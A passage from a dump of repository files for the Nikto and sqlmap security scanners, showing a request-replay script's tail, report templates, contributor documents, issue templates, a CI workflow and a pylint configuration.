$request->{'whisker'}->{'ssl'};\nprint \"://\"\n  . $request{'whisker'}->{'host'} . \":\"\n  . $request{'whisker'}->{'port'}\n  . $request{'whisker'}->{'uri'} . \"\\n\";\nprint $header;\n\n# make request\nLW2::http_fixup_request(\\%request);\nLW2::http_do_request_timeout(\\%request, \\%result);\n\n# output for the user\nprint \"-\" x 44, \"  Response\\n\";\n\nforeach my $k (@{ $result{'whisker'}->{'header_order'} }) {\n    print \"$k: \" . $result{$k} . \"\\n\";\n}\n\nprint \"\\n$result{'whisker'}->{'data'}\\n\\n\";\n\n###############################################################################\nsub usage {\n    print \"replay.pl -- Replay a saved scan result\\n\";\n    print \"     -file \t\tParse request from this file\\n\";\n    print \"     -proxy\t\tSend request through this proxy (format: host:port)\\n\";\n    print \"     -help\t\tHelp output\\n\";\n    exit;\n}\n"
  },
  {
    "path": "nikto/program/templates/htm_close.tmpl",
    "content": "<p class=\"copyright\">&copy; 2008 Chris Sullo</p>\n\n<!-- (c) 2008 Chris Sullo -->\n\n</body>\n</html>\n"
  },
  {
    "path": "nikto/program/templates/htm_end.tmpl",
    "content": "<div>\n<p></p>\n<table class=\"headerTable\">\n <tr>\n  <td>Host Summary</td>\n </tr>\n</table>\n<table  class=\"dataTable\">\n <tr>\n  <td class=\"column-head\">Start Time</td>\n  <td>#TEMPL_START#</td>\n </tr>\n <tr>\n  <td class=\"column-head\">End Time</td>\n  <td>#TEMPL_END#</td>\n </tr>\n <tr>\n  <td class=\"column-head\">Elapsed Time</td>\n  <td>#TEMPL_ELAPSED# seconds</td>\n </tr>\n <tr>\n  <td class=\"column-head\">Statistics</td>\n  <td>#TEMPL_STATISTICS#</td>\n </tr>\n</table>\n</div>\n<p></p>\n"
  },
  {
    "path": "nikto/program/templates/htm_host_head.tmpl",
    "content": "<div>\n<a name=\"#TEMPL_HCTR#\"></a>\n<table class=\"headerTable\">\n <tr>\n   <td>#TEMPL_HOSTNAME# / #TEMPL_IP# port #TEMPL_PORT#</td>\n </tr>\n</table>\n<table class=\"dataTable\">\n <tr>\n   <td class=\"column-head\">Target IP</td>\n   <td>#TEMPL_IP#</td>\n </tr>\n <tr>\n   <td class=\"column-head\">Target hostname</td>\n   <td>#TEMPL_HOSTNAME#</td>\n </tr>\n  <tr>\n   <td class=\"column-head\">Target Port</td>\n   <td>#TEMPL_PORT#</td>\n </tr>\n  <tr>\n   <td class=\"column-head\">HTTP Server</td>\n   <td>#TEMPL_BANNER#</td>\n </tr>\n <tr>\n   <td class=\"column-head\">Site Link (Name)</td>\n   <td><a href=\"#TEMPL_LINK_NAME#\">#TEMPL_LINK_NAME#</a></td>\n </tr>\n <tr>\n   <td class=\"column-head\">Site Link (IP)</td>\n   <td><a href=\"#TEMPL_LINK_IP#\">#TEMPL_LINK_IP#</a></td>\n </tr>\n </table>\n</div>\n<p></p>\n"
  },
  {
    "path": "nikto/program/templates/htm_host_im.tmpl",
    "content": "<table class=\"dataTable\">\n <tr>\n  <td class=\"column-head\">Information</td>\n  <td>#TEMPL_SMMSG#</td>\n </tr>\n <tr>\n  <td class=\"column-head\">References</td>\n  <td>#TEMPL_REFERENCES#</td>\n </tr>\n</table>\n"
  },
  {
    "path": "nikto/program/templates/htm_host_item.tmpl",
    "content": "<table class=\"dataTable\">\n  <tr>\n    <td class=\"column-head\">URI</td>\n    <td>#TEMPL_URI#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">HTTP Method</td>\n    <td>#TEMPL_HTTP_METHOD#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">Description</td>\n    <td>#TEMPL_MSG#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">Test Links</td>\n    <td>\n      <a href=\"#TEMPL_ITEM_NAME_LINK#\">#TEMPL_ITEM_NAME_LINK#</a><br>\n      <a href=\"#TEMPL_ITEM_IP_LINK#\">#TEMPL_ITEM_IP_LINK#</a>\n    </td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">References</td>\n    <td>#TEMPL_REFERENCES#</td>\n</table>\n"
  },
  {
    "path": "nikto/program/templates/htm_start.tmpl",
    "content": "<!DOCTYPE html>\n<html>\n<head>\n <meta http-equiv=\"Content-Type\" content=\"text/html;charset=utf-8\">\n <title>Nikto Report</title>\n <style type=\"text/css\">\n  .dataTable\n  {\n   font-family: tahoma, sans-serif;\n   font-size: 11pt;\n   font-weight: normal;\n   color: #000066;\n   background: #EEEEEE;\n   border: thin solid black;\n   width: 95%;\n  }\n  .headerTable\n  {\n   font-family: tahoma, sans-serif;\n   font-size: 15pt;\n   font-weight: normal;\n   color: white;\n   background: #000066;\n   border: thin solid black;\n   width: 300px;\n  }\n  .column-head\n  {\n   width: 15em;\n   font-weight:bold;\n   vertical-align: top;\n  }\n  .copyright\n  {\n   font-family: tahoma, sans-serif;\n   font-size: 10pt;\n   font-weight: normal;\n   font-style: italic;\n   color: black;\n  }\n  body\n  {\n   background: white;\n  }\n </style>\n</head>\n<body>\n"
  },
  {
    "path": "nikto/program/templates/htm_stop.tmpl",
    "content": "<p class=\"copyright\">&copy; 2007 Chris Sullo</p>\n\n<!-- (c) 2007 Chris Sullo -->\n\n</body>\n</html>\n"
  },
  {
    "path": "nikto/program/templates/htm_summary.tmpl",
    "content": "<p></p>\n<table class=\"headerTable\">\n  <tr>\n    <td>Scan Summary</td>\n  </tr>\n</table>\n<table class=\"dataTable\">\n  <tr>\n    <td class=\"column-head\">Software Details</td>\n    <td><a href=\"http://cirt.net/\">Nikto #TEMPL_NIKTO_VER#</a></td>\n  <tr>\n    <td class=\"column-head\">CLI Options</td>\n    <td>#TEMPL_NIKTO_CLI#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">Hosts Tested</td>\n    <td>#TEMPL_NIKTO_HOSTS_TESTED#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">Start Time</td>\n    <td>#TEMPL_SCAN_START#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">End Time</td>\n    <td>#TEMPL_SCAN_END#</td>\n  </tr>\n  <tr>\n    <td class=\"column-head\">Elapsed Time</td>\n    <td>#TEMPL_SCAN_ELAPSED#</td>\n  </tr>\n</table>\n<p></p>\n"
  },
  {
    "path": "nikto/program/templates/xml_close.tmpl",
    "content": "</niktoscan>\n"
  },
  {
    "path": "nikto/program/templates/xml_end.tmpl",
    "content": "<statistics elapsed=\"#TEMPL_ELAPSED#\" itemsfound=\"#TEMPL_ITEMS_FOUND#\" itemstested=\"#TEMPL_ITEMS_TESTED#\" endtime=\"#TEMPL_END#\" />\n</scandetails>\n\n</niktoscan>\n"
  },
  {
    "path": "nikto/program/templates/xml_host_head.tmpl",
    "content": "<niktoscan hoststest=\"#TEMPL_NIKTO_HOSTS_TESTED#\" options=\"#TEMPL_NIKTO_CLI#\" version=\"#TEMPL_NIKTO_VER#\" scanstart=\"#TEMPL_SCAN_START#\" scanend=\"#TEMPL_SCAN_END#\" scanelapsed=\"#TEMPL_SCAN_ELAPSED#\" nxmlversion=\"1.2\">\n\n<scandetails targetip=\"#TEMPL_IP#\" targethostname=\"#TEMPL_HOSTNAME#\" targetport=\"#TEMPL_PORT#\" targetbanner=\"#TEMPL_BANNER#\" starttime=\"#TEMPL_START#\" sitename=\"#TEMPL_LINK_NAME#\" siteip=\"#TEMPL_LINK_IP#\" hostheader=\"#TEMPL_HOST_HEADER#\" errors=\"#TEMPL_ERRORS#\" checks=\"#TEMPL_CTR#\">\n#TEMPL_SSL_INFO#\n"
  },
  {
    "path": "nikto/program/templates/xml_host_im.tmpl",
    "content": "<item id=\"#ID#\">\n<description>#TEMPL_SMMSG#</description>\n</item>\n"
  },
  {
    "path": "nikto/program/templates/xml_host_item.tmpl",
    "content": "<item id=\"#ID#\" osvdbid=\"#TEMPL_OSVDB#\" osvdblink=\"#TEMPL_OSVDB_LINK#\" method=\"#TEMPL_HTTP_METHOD#\">\n<description><![CDATA[#TEMPL_MSG#]]></description>\n<uri><![CDATA[#TEMPL_URI#]]></uri>\n<namelink><![CDATA[#TEMPL_ITEM_NAME_LINK#]]></namelink>\n<iplink><![CDATA[#TEMPL_ITEM_IP_LINK#]]></iplink>\n</item>\n"
  },
  {
    "path": "nikto/program/templates/xml_start.tmpl",
    "content": "<?xml version=\"1.0\" ?>\n<!DOCTYPE niktoscan SYSTEM \"#NIKTODTD#\">\n<niktoscan>\n"
  },
  {
    "path": "nikto/program/templates/xml_summary.tmpl",
    "content": ""
  },
  {
    "path": "sqlmap/.gitattributes",
    "content": "*.conf text eol=lf\n*.md text eol=lf\n*.md5 text eol=lf\n*.py text eol=lf\n*.xml text eol=lf\nLICENSE text eol=lf\nCOMMITMENT text eol=lf\n\n*_ binary\n*.dll binary\n*.pdf binary\n*.so binary\n*.wav binary\n*.zip binary\n*.x32 binary\n*.x64 binary\n*.exe binary\n*.sln binary\n*.vcproj binary\n"
  },
  {
    "path": "sqlmap/.github/CODE_OF_CONDUCT.md",
    "content": "# Contributor Covenant Code of Conduct\n\n## Our Pledge\n\nIn the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.\n\n## Our Standards\n\nExamples of behavior that contributes to creating a positive environment include:\n\n* Using welcoming and inclusive language\n* Being respectful of differing viewpoints and experiences\n* Gracefully accepting constructive criticism\n* Focusing on what is best for the community\n* Showing empathy towards other community members\n\nExamples of unacceptable behavior by participants include:\n\n* The use of sexualized language or imagery and unwelcome sexual attention or advances\n* Trolling, insulting/derogatory comments, and personal or political attacks\n* Public or private harassment\n* Publishing others' private information, such as a physical or electronic address, without explicit permission\n* Other conduct which could reasonably be considered inappropriate in a professional setting\n\n## Our Responsibilities\n\nProject maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.\n\nProject maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.\n\n## Scope\n\nThis Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.\n\n## Enforcement\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.\n\nProject maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.\n\n## Attribution\n\nThis Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]\n\n[homepage]: http://contributor-covenant.org\n[version]: http://contributor-covenant.org/version/1/4/\n"
  },
  {
    "path": "sqlmap/.github/CONTRIBUTING.md",
    "content": "# Contributing to sqlmap\n\n## Reporting bugs\n\n**Bug reports are welcome**!\nPlease report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues).\n\n### Guidelines\n\n* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant.\n* Make sure you can reproduce the bug with the latest development version of sqlmap.\n* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal.\n* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?*\n\n## Submitting code changes\n\nAll code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37).\n\nOur preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests).\nMany [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next!\n\n### Guidelines\n\nIn order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:\n\n* Each patch should make one logical change.\n* Avoid tabbing, use four blank spaces instead.\n* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).\n* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.\n* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests.\n* Style that is too different from main branch will be ''adapted'' by the developers side.\n* Do not touch anything inside `thirdparty/` and `extra/` folders.\n\n### Licensing\n\nBy submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them.\n"
  },
  {
    "path": "sqlmap/.github/FUNDING.yml",
    "content": "github: sqlmapproject\n"
  },
  {
    "path": "sqlmap/.github/ISSUE_TEMPLATE/bug_report.md",
    "content": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: bug report\nassignees: ''\n\n---\n\n**Describe the bug**\nA clear and concise description of what the bug is.\n\n**To Reproduce**\n1. Run '...'\n2. See error\n\n**Expected behavior**\nA clear and concise description of what you expected to happen.\n\n**Screenshots**\nIf applicable, add screenshots to help explain your problem.\n\n**Running environment:**\n - sqlmap version [e.g. 1.3.5.93#dev]\n - Installation method [e.g. git]\n - Operating system: [e.g. Microsoft Windows 10]\n - Python version [e.g. 3.5.2]\n\n**Target details:**\n - DBMS [e.g. Microsoft SQL Server]\n - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]\n - WAF/IPS [if any]\n - Relevant console output [if any]\n - Exception traceback [if any]\n\n**Additional context**\nAdd any other context about the problem here.\n"
  },
  {
    "path": "sqlmap/.github/ISSUE_TEMPLATE/feature_request.md",
    "content": "---\nname: Feature request\nabout: Suggest an idea for this project\ntitle: ''\nlabels: feature request\nassignees: ''\n\n---\n\n**Is your feature request related to a problem? Please describe.**\nA clear and concise description of what the problem is. Ex. I'm always frustrated when [...]\n\n**Describe the solution you'd like**\nA clear and concise description of what you want to happen.\n\n**Describe alternatives you've considered**\nA clear and concise description of any alternative solutions or features you've considered.\n\n**Additional context**\nAdd any other context or screenshots about the feature request here.\n"
  },
  {
    "path": "sqlmap/.github/workflows/tests.yml",
    "content": "on:\n  push:\n    branches: [ master ]\n  pull_request:\n    branches: [ master ]\n\njobs:\n  build:\n    runs-on: ${{ matrix.os }}\n    strategy:\n      matrix:\n        os: [ubuntu-latest, macos-latest, windows-latest]\n        python-version: [ '2.x', '3.10', 'pypy-2.7', 'pypy-3.7' ]\n    steps:\n      - uses: actions/checkout@v2\n      - name: Set up Python\n        uses: actions/setup-python@v2\n        with:\n          python-version: ${{ matrix.python-version }}\n      - name: Basic import test\n        run: python -c \"import sqlmap; import sqlmapapi\"\n      - name: Smoke test\n        run: python sqlmap.py --smoke\n      - name: Vuln test\n        run: python sqlmap.py --vuln\n"
  },
  {
    "path": "sqlmap/.gitignore",
    "content": "output/\n__pycache__/\n*.py[cod]\n.sqlmap_history\ntraffic.txt\n*~\nreq*.txt\n.idea/"
  },
  {
    "path": "sqlmap/.pylintrc",
    "content": "# Based on Apache 2.0 licensed code from https://github.com/ClusterHQ/flocker\n\n[MASTER]\n\n# Specify a configuration file.\n#rcfile=\n\n# Python code to execute, usually for sys.path manipulation such as\n# pygtk.require().\ninit-hook=\"from pylint.config import find_pylintrc; import os, sys; sys.path.append(os.path.dirname(find_pylintrc()))\"\n\n# Add files or directories to the blacklist. They should be base names, not\n# paths.\nignore=\n\n# Pickle collected data for later comparisons.\npersistent=no\n\n# List of plugins (as comma separated values of python modules names) to load,\n# usually to register additional checkers.\nload-plugins=\n\n# Use multiple processes to speed up Pylint.\n# DO NOT CHANGE THIS VALUES >1 HIDE RESULTS!!!!!\njobs=1\n\n# Allow loading of arbitrary C extensions. Extensions are imported into the\n# active Python interpreter and may run arbitrary code.\nunsafe-load-any-extension=no\n\n# A comma-separated list of package or module names from where C extensions may\n# be loaded. Extensions are loading into the active Python interpreter and may\n# run arbitrary code\nextension-pkg-whitelist=\n\n# Allow optimization of some AST trees. This will activate a peephole AST\n# optimizer, which will apply various small optimizations. For instance, it can\n# be used to obtain the result of joining multiple strings with the addition\n# operator. Joining a lot of strings can lead to a maximum recursion error in\n# Pylint and this flag can prevent that. It has one side effect, the resulting\n# AST will be different than the one from reality.\noptimize-ast=no\n\n\n[MESSAGES CONTROL]\n\n# Only show warnings with the listed confidence levels. Leave empty to show\n# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED\nconfidence=\n\n# Enable the message, report, category or checker with the given id(s). You can\n# either give multiple identifier separated by comma (,) or put this option\n# multiple time. See also the \"--disable\" option for examples.\ndisable=all\n\nenable=import-error,\n       import-self,\n       reimported,\n       wildcard-import,\n       misplaced-future,\n       deprecated-module,\n       unpacking-non-sequence,\n       invalid-all-object,\n       undefined-all-variable,\n       used-before-assignment,\n       cell-var-from-loop,\n       global-variable-undefined,\n       redefine-in-handler,\n       unused-import,\n       unused-wildcard-import,\n       global-variable-not-assigned,\n       undefined-loop-variable,\n       global-at-module-level,\n       bad-open-mode,\n       redundant-unittest-assert,\n       boolean-datetime\n       deprecated-method,\n       anomalous-unicode-escape-in-string,\n       anomalous-backslash-in-string,\n       not-in-loop,\n       continue-in-finally,\n       abstract-class-instantiated,\n       star-needs-assignment-target,\n       duplicate-argument-name,\n       return-in-init,\n       too-many-star-expressions,\n       nonlocal-and-global,\n       return-outside-function,\n       return-arg-in-generator,\n       invalid-star-assignment-target,\n       bad-reversed-sequence,\n       nonexistent-operator,\n       yield-outside-function,\n       init-is-generator,\n       nonlocal-without-binding,\n       lost-exception,\n       assert-on-tuple,\n       dangerous-default-value,\n       duplicate-key,\n       useless-else-on-loop\n       expression-not-assigned,\n       confusing-with-statement,\n       unnecessary-lambda,\n       pointless-statement,\n       pointless-string-statement,\n       unnecessary-pass,\n       unreachable,\n       using-constant-test,\n       bad-super-call,\n       missing-super-argument,\n       slots-on-old-class,\n       super-on-old-class,\n       property-on-old-class,\n       not-an-iterable,\n       not-a-mapping,\n       format-needs-mapping,\n       truncated-format-string,\n       missing-format-string-key,\n       mixed-format-string,\n       too-few-format-args,\n       bad-str-strip-call,\n       too-many-format-args,\n       bad-format-character,\n       format-combined-specification,\n       bad-format-string-key,\n       bad-format-string,\n       missing-format-attribute,\n       missing-format-argument-key,\n       unused-format-string-argument\n       unused-format-string-key,\n       invalid-format-index,\n       bad-indentation,\n       mixed-indentation,\n       unnecessary-semicolon,\n       lowercase-l-suffix,\n       invalid-encoded-data,\n       unpacking-in-except,\n       import-star-module-level,\n       long-suffix,\n       old-octal-literal,\n       old-ne-operator,\n       backtick,\n       old-raise-syntax,\n       metaclass-assignment,\n       next-method-called,\n       dict-iter-method,\n       dict-view-method,\n       indexing-exception,\n       raising-string,\n       using-cmp-argument,\n       cmp-method,\n       coerce-method,\n       delslice-method,\n       getslice-method,\n       hex-method,\n       nonzero-method,\n       t-method,\n       setslice-method,\n       old-division,\n       logging-format-truncated,\n       logging-too-few-args,\n       logging-too-many-args,\n       logging-unsupported-format,\n       logging-format-interpolation,\n       invalid-unary-operand-type,\n       unsupported-binary-operation,\n       not-callable,\n       redundant-keyword-arg,\n       assignment-from-no-return,\n       assignment-from-none,\n       not-context-manager,\n       repeated-keyword,\n       missing-kwoa,\n       no-value-for-parameter,\n       invalid-sequence-index,\n       invalid-slice-index,\n       unexpected-keyword-arg,\n       unsupported-membership-test,\n       unsubscriptable-object,\n       access-member-before-definition,\n       method-hidden,\n       assigning-non-slot,\n       duplicate-bases,\n       inconsistent-mro,\n       inherit-non-class,\n       invalid-slots,\n       invalid-slots-object,\n       no-method-argument,\n       no-self-argument,\n       unexpected-special-method-signature,\n       non-iterator-returned,\n       arguments-differ,\n       signature-differs,\n       bad-staticmethod-argument,\n       non-parent-init-called,\n       bad-except-order,\n       catching-non-exception,\n       bad-exception-context,\n       notimplemented-raised,\n       raising-bad-type,\n       raising-non-exception,\n       misplaced-bare-raise,\n       duplicate-except,\n       nonstandard-exception,\n       binary-op-exception,\n       not-async-context-manager,\n       yield-inside-async-function\n\n# Needs investigation:\n# abstract-method (might be indicating a bug? probably not though)\n# protected-access (requires some refactoring)\n# attribute-defined-outside-init (requires some refactoring)\n# super-init-not-called (requires some cleanup)\n\n# Things we'd like to enable someday:\n# redefined-builtin (requires a bunch of work to clean up our code first)\n# redefined-outer-name (requires a bunch of work to clean up our code first)\n# undefined-variable (re-enable when pylint fixes https://github.com/PyCQA/pylint/issues/760)\n# no-name-in-module (giving us spurious warnings https://github.com/PyCQA/pylint/issues/73)\n# unused-argument (need to clean up or code a lot, e.g. prefix unused_?)\n# function-redefined (@overload causes lots of spurious warnings)\n# too-many-function-args (@overload causes spurious warnings... I think)\n# parameter-unpacking (needed for eventual Python 3 compat)\n# print-statement (needed for eventual Python 3 compat)\n# filter-builtin-not-iterating (Python 3)\n# map-builtin-not-iterating (Python 3)\n# range-builtin-not-iterating (Python 3)\n# zip-builtin-not-iterating (Python 3)\n# many others relevant to Python 3\n# unused-variable (a little work to cleanup, is all)\n\n# ...\n[REPORTS]\n\n# Set the output format. Available formats are text, parseable, colorized, msvs\n# (visual studio) and html. You can also give a reporter class, eg\n# mypackage.mymodule.MyReporterClass.\noutput-format=parseable\n\n# Put messages in a separate file for each module / package specified on the\n# command line instead of printing them on stdout. Reports (if any) will be\n# written in a file name \"pylint_global.[txt|html]\".\nfiles-output=no\n\n# Tells whether to display a full report or only the messages\nreports=no\n\n# Python expression which should return a note less than 10 (10 is the highest\n# note). You have access to the variables errors warning, statement which\n# respectively contain the number of errors / warnings messages and the total\n# number of statements analyzed. This is used by the global evaluation report\n# (RP0004).\nevaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)\n\n# Template used to display messages. This is a python new-style format string\n# used to format the message information. See doc for all details\n#msg-template=\n\n\n[LOGGING]\n\n# Logging modules to check that the string format arguments are in logging\n# function parameter format\nlogging-modules=logging\n\n\n[FORMAT]\n\n# Maximum number of characters on a single line.\nmax-line-length=100\n\n# Regexp for a line that is allowed to be longer than the limit.\nignore-long-lines=^\\s*(# )?<?https?://\\S+>?$\n\n# Allow the body of an if to be on the same line as the test if there is no\n# else.\nsingle-line-if-stmt=no\n\n# List of optional constructs for which whitespace checking is disabled. `dict-\n# separator` is used to allow tabulation in dicts, etc.: {1  : 1,\\n222: 2}.\n# `trailing-comma` allows a space between comma and closing bracket: (a, ).\n# `empty-line` allows space-only lines.\nno-space-check=trailing-comma,dict-separator\n\n# Maximum number of lines in a module\nmax-module-lines=1000\n\n# String used as indentation unit. This is usually \"    \" (4 spaces) or \"\\t\" (1\n# tab).\nindent-string='    '\n\n# Number of spaces of indent required inside a hanging  or continued line.\nindent-after-paren=4\n\n# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.\nexpected-line-ending-format=\n\n\n[TYPECHECK]\n\n# Tells whether missing members accessed in mixin class should be ignored. A\n# mixin class is detected if its name ends with \"mixin\" (case insensitive).\nignore-mixin-members=yes\n\n# List of module names for which member attributes should not be checked\n# (useful for modules/projects where namespaces are manipulated during runtime\n# and thus existing member attributes cannot be deduced by static analysis. It\n# supports qualified module names, as well as Unix pattern matching.\nignored-modules=thirdparty.six.moves\n\n# List of classes names for which member attributes should not be checked\n# (useful for classes with attributes dynamically set). This supports can work\n# with qualified names.\nignored-classes=\n\n# List of members which are set dynamically and missed by pylint inference\n# system, and so shouldn't trigger E1101 when accessed. Python regular\n# expressions are accepted.\ngenerated-members=\n\n\n[VARIABLES]\n\n# Tells whether we should check for unused import in __init__ files.\ninit-import=no\n\n# A regular expression matching the name of dummy variables (i.e. expectedly\n# not used).\ndummy-variables-rgx=_$|dummy\n\n# List of additional names supposed to be defined in builtins. Remember that\n# you should avoid to define new builtins when possible.\nadditional-builtins=\n\n# List of strings which can identify a callback function by name. A callback\n# name must start or end with one of those strings.\ncallbacks=cb_,_cb\n\n\n[SIMILARITIES]\n\n# Minimum lines number of a similarity.\nmin-similarity-lines=4\n\n# Ignore comments when computing similarities.\nignore-comments=yes\n\n# Ignore docstrings when computing similarities.\nignore-docstrings=yes\n\n# Ignore imports when computing similarities.\nignore-imports=no\n\n\n[SPELLING]\n\n# Spelling dictionary name. Available dictionaries: none. To make it working\n# install python-enchant package.\nspelling-dict=\n\n# List of comma separated words that should not be checked.\nspelling-ignore-words=\n\n# A path to a file that contains private dictionary; one word per line.\nspelling-private-dict-file=\n\n# Tells whether to store unknown words to indicated private dictionary in\n# --spelling-private-dict-file option instead of raising a message.\nspelling-store-unknown-words=no\n\n\n[MISCELLANEOUS]\n\n# List of note tags to take in consideration, separated by a comma.\nnotes=FIXME,XXX,TODO\n\n\n[BASIC]\n\n# List of builtins function names that should not be used, separated by a comma\nbad-functions=map,filter,input\n\n# Good variable names which should always be accepted, separated by a comma\ngood-names=i,j,k,ex,Run,_\n\n# Bad variable names which should always be refused, separated by a comma\nbad-names=foo,bar,baz,toto,tutu,tata\n\n# Colon-delimited sets of names that determine each other's naming style when\n# the name regexes allow several styles.\nname-group=\n\n# Include a hint for the correct naming format with invalid-name\ninclude-naming-hint=no\n\n# Regular expression matching correct function names\nfunction-rgx=[a-z_][a-z0-9_]{2,30}$\n\n# Naming hint for function names\nfunction-name-hint=[a-z_][a-z0-9_]{2,30}$\n\n# Regular expression matching correct variable names\nvariable-rgx=[a-z_][a-z0-9_]{2,30}$\n\n# Naming hint for variable names\nvariable-name-hint=[a-z_][a-z0-9_]{2,30}$\n\n# Regular expression matching correct constant names\nconst-rgx=(([A-Z_][A-Z0-9_]*)|(__.*__))$\n\n# Naming hint for constant names\nconst-name-hint=(([A-Z_][A-Z0-9_]*)|(__.*__))$\n\n# Regular expression matching correct attribute names\nattr-rgx=[a-z_][a-z0-9_]{2,30}$\n\n# Naming hint for attribute names\nattr-name-hint=[a-z_][a-z0-9_]{2,30}$\n\n# Regular expression matching correct argument names\nargument-rgx=[a-z_][a-z0-9_]{2,30}$\n\n# Naming hint for argument names\nargument-name-hint=[a-z_][a-z0-9_]{2,30}$\n\n# Regular expression matching correct class attribute names\nclass-attribute-rgx=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$\n\n# Naming hint for class attribute names\nclass-attribute-name-hint=([A-Za-z_][A-Za-z0-9_]{2,30}|(__.*__))$\n\n# Regular expression matching correct inline iteration names\ninlinevar-rgx=[A-Za-z_][A-Za-z0-9_]*$\n\n# Naming hint for inline iteration names\ninlinevar-name-hint=[A-Za-z_][A-Za-z0-9_]*$\n\n# Regular expression matching correct class names\nclass-rgx=[A-Z_][a-zA-Z0-9]+$\n\n# Naming hint for class names\nclass-name-hint=[A-Z_][a-zA-Z0-9]+$\n\n# Regular expression matching correct module names\nmodule-rgx=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$\n\n# Naming hint for module names\nmodule-name-hint=(([a-z_][a-z0-9_]*)|([A-Z][a-zA-Z0-9]+))$\n\n# Regular expression matching correct method names\nmethod-rgx=[a-z_][a-z0-9_]{2,30}$\n\n# Naming hint for method names\nmethod-name-hint=[a-z_][a-z0-9_]{2,30}$\n\n# Regular expression which should only match function or class names that do\n# not require a docstring.\nno-docstring-rgx=^_\n\n# Minimum line length for functions/classes that require docstrings, shorter\n# ones are exempt.\ndocstring-min-length=-1\n\n\n[ELIF]\n\n# Maximum number of nested blocks for function / method body\nmax-nested-blocks=5\n\n\n[IMPORTS]\n\n# Deprecated modules which should not be used, separated by a comma\ndeprecated-modules=regsub,TERMIOS,Bastion,rexec\n\n# Create a graph of every (i.e. internal and external) dependencies in the\n# given file (report RP0402 must not be disabled)\nimport-graph=\n\n# Create a graph of external dependencies in the given file (report RP0402 must\n# not be disabled)\next-import-graph=\n\n# Create a graph of internal dependencies in the given file (report RP0402 must\n# not be disabled)\nint-import-graph=\n\n\n[DESIGN]\n\n# Maximum number of arguments for function / method\nmax-args=5\n\n# Argument names that match this expression will be ignored. Default to name\n# with leading underscore\nignored-argument-names=_.*\n\n# Maximum number of locals for function / method body\nmax-locals=15\n\n# Maximum number of return / yield for function / method body\nmax-returns=6\n\n# Maximum number of branch for function / method body\nmax-branches=12\n\n# Maximum number of statements in function / method body\nmax-statements=50\n\n# Maximum number of parents for a class (see R0901).\nmax-parents=7\n\n# Maximum number of attributes for a class (see R0902).\nmax-attributes=7\n\n# Minimum number of public methods for a class (see R0903).\nmin-public-methods=2\n\n# Maximum number of public methods for a class (see R0904).\nmax-public-methods=20\n\n# Maximum number of boolean expressions in a if statement\nmax-bool-expr=5\n\n\n[CLASSES]\n\n# List of method names used to declare (i.e. assign) instance attributes.\ndefining-attr-methods=__init__,__new__,setUp\n\n# List of valid names for the first argument in a class method.\nvalid-classmethod-first-arg=cls\n\n# List of 